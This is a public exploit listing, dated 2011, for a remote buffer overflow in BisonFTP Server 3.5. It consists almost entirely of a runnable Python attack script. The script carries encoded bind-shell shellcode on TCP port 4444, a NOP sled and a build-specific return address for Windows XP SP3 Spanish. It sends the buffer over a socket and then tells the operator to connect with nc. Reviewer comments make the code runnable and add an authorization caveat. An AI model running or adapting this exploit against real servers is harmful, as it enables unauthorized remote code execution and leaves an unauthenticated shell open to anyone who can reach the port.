BisonFTP Server 3.5 Buffer Overflow (public exploit listing)
Posted on 11 August 2011
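#!/usr/bin/python
# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
# Newer version's not tested, maybe vulnerable too
# written by localh0t
# Date: 10/08/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar | www.mfsec.com.ar
# Thanks to: Pr0zac, Irakirashia, Kchito
# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
# Shellcode: List shell on port 4444 (Change as you wish)
#
# NOTE(review): the published listing had lost the backslashes from every
# hex escape ("x90" instead of "\x90"), so it could not run as printed.
# They are restored here; the byte counts below match the author's own
# comments (1092-byte NOP sled, 368-byte shellcode, 8-byte pad, 4-byte
# return address).  Use only against systems you are authorized to test.

import os
import socket
import struct
import sys
import time

# Number of NOP (0x90) bytes placed in front of the shellcode (author's value).
NOP_SLED_LEN = 1092
# Bytes of NOP padding between the shellcode and the overwritten return address.
TRAILING_PAD_LEN = 8
# Port the bind shell listens on once the payload runs (per the author's
# comment; the encoded payload itself cannot be inspected from this listing).
BIND_SHELL_PORT = 4444

# 368-byte encoded payload.  The author describes it as a bind shell on
# TCP/4444.  NOTE(review): such a listener is unauthenticated -- anyone who
# can reach the port gets the shell, not just the tester.
SHELLCODE = (
    b"\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
    b"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
    b"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
    b"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
    b"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
    b"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
    b"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
    b"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
    b"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"
    b"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
    b"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
    b"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
    b"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
    b"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
    b"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
    b"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
    b"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
    b"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
    b"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
    b"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
    b"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
    b"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
    b"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
    b"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
    b"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35"
)

# Address of a "jmp edx" gadget in shell32.dll on Windows XP SP3 Spanish
# (0x7e3c5c9a); edx points at the NOP sled when the overwritten return
# address is used.  This is build-specific: another Windows language or
# service pack needs a different gadget address.
RET_ADDR = struct.pack("<I", 0x7E3C5C9A)

# A newline terminates the FTP command line, which is what the author relies
# on to have the oversized input processed.
LINE_END = b"\x0a"


def build_payload():
    """Return the complete overflow buffer sent to the FTP service.

    Layout (front to back): NOP sled, shellcode, NOP pad, return address,
    newline.  Total length is NOP_SLED_LEN + len(SHELLCODE) +
    TRAILING_PAD_LEN + 4 + 1 bytes.
    """
    return b"".join([
        b"\x90" * NOP_SLED_LEN,
        SHELLCODE,
        b"\x90" * TRAILING_PAD_LEN,
        RET_ADDR,
        LINE_END,
    ])


def main(argv):
    """Connect to <host> <port>, read the banner, send the overflow buffer.

    Returns a process exit status.  The script cannot observe whether the
    payload actually ran; it only reports that the buffer was delivered.
    """
    if len(argv) < 3:
        print(" BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit")
        print(" Usage: %s <host> <port> " % (argv[0]))
        return 1

    host = argv[1]
    port = int(argv[2])  # raises ValueError on a non-numeric port

    print(" [!] Connecting to %s ..." % host)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.recv(1024)  # consume the FTP banner
        # Author's delay before sending; presumably gives the server time to
        # finish its greeting -- not explained in the original.
        time.sleep(5)

        print("[!] Sending exploit...")
        # sendall: sock.send() may deliver only part of a ~1.5 KB buffer.
        sock.sendall(build_payload())
        try:
            sock.recv(1024)
        except socket.error:
            # Once control flow is hijacked the server usually stops
            # answering; a reset here is expected, not an error.
            pass
    finally:
        sock.close()

    # Success is NOT verified -- the original printed "Exploit succeed"
    # unconditionally.  Tell the operator what to try instead.
    print("[!] Buffer sent. If it worked, connect with: nc %s %d "
          "(success is not verified by this script)" % (host, BIND_SHELL_PORT))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))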
